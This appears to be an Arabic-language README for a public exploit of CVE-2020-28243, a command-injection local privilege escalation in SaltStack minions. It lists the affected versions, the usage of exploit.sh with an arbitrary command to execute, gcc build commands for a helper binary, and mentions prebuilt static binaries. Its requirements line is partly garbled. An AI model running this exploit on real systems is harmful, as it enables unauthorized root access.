
CVE-2020-28243 استغلال تصعيد الصلاحيات المحلية في SaltStack Minion
ثغرة حقن أوامر في Salt الخاص بـ SaltStack تسمح بتصعيد الصلاحيات عبر أسماء عمليات مصممة خصيصًا على الـ minion عندما يستدعي الـ master الدالة restartcheck. للحصول على شرح كامل، يرجى الاطلاع على هذا المنشور
الإصدارات المتأثرة: جميع الإصدارات بين 2016.3.0rc2 و3002.2
لكي يعمل هذا الاستغلال، يلزم ما يلي:
restartcheck.restartcheck على هذا الـ minion لتفعيل الاستغلال./exploit.sh -w PATH -c 'COMMAND'
-w PATH writable path (and not blocked by SaltStack)
-c COMMAND command to execute

عندما لا يكون gcc متاحًا لتجميع الملف الثنائي المساعد على الجهاز الهدف، يمكنك تجميعه على جهازك ونسخ الملف الثنائي إليه.
gcc helper.c -o ./helper -static
# Or for 32 bit:
gcc helper.c -o ./helper -m32 -static
بدلاً من ذلك، تم توفير ملفات ثنائية ثابتة في هذا المستودع يمكنك استخدامها في مجلد static.